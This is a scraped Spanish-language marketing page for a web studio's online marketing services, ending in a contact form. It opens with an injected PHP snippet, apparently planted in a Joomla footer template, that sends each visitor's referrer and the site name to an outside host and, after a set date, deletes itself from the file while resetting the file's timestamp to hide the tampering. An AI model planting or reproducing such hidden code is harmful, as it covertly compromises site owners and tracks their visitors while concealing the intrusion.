check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Web Marketing

Estar en internet no garantiza que su sitio sea frecuentemente visitado.Estudio Alas le proporciona las herramientas necesarias para que su sitio web genere más visitas y estas puedan convertirse en potenciales clientes.

Marketing en Internet es el estudio de las técnicas del uso de Internet para publicitar y vender productos y servicios. Incluye la publicidad por click, los avisos en páginas web, los envíos de correo masivos, el marketing en buscadores (incluyendo la optimización en buscadores) y la utilización de redes sociales.

El marketing de buscadores, banners y de e-mailing, lleva consigo una estrategia compleja que exige un conocimiento profundo y actualizado de las tendencias en Internet.

El marketing en el mundo es un componente del comercio electrónico. Puede incluir la gestión de contenidos, las relaciones públicas, el servicio al cliente y las ventas.. El comercio electrónico y el marketing en Internet se han vuelto más populares en la medida en que los proveedores de Internet se están volviendo más accesibles. Más de un tercio de los consumidores que tienen acceso a Internet en sus hogares afirman haber utilizado Internet como medio para realizar sus compras.

Es el marketing de internet uno de los cuatro paradigmas de marketing, según Phillip Kotler, que una empresa debe elegir como base para la aplicación de una estrategia.

Nuestros Servicios:

tick Email Marketing
tick Google Analytics
tick Imagen Empresarial tick Banners Publicitarios
tick SEO tick Publicidad en Facebook
tick Google AdWords

 

Consultas de Web Marketing


Obtener más información acerca de WEB Marketing
Solicitar una presentación personal:
Nos conoce por:
Nombre: *
Empresa: *
Cargo: *
E-mail: *
Teléfono: *
Sitio web actual:
País:
Consulta:
Verificación Humana: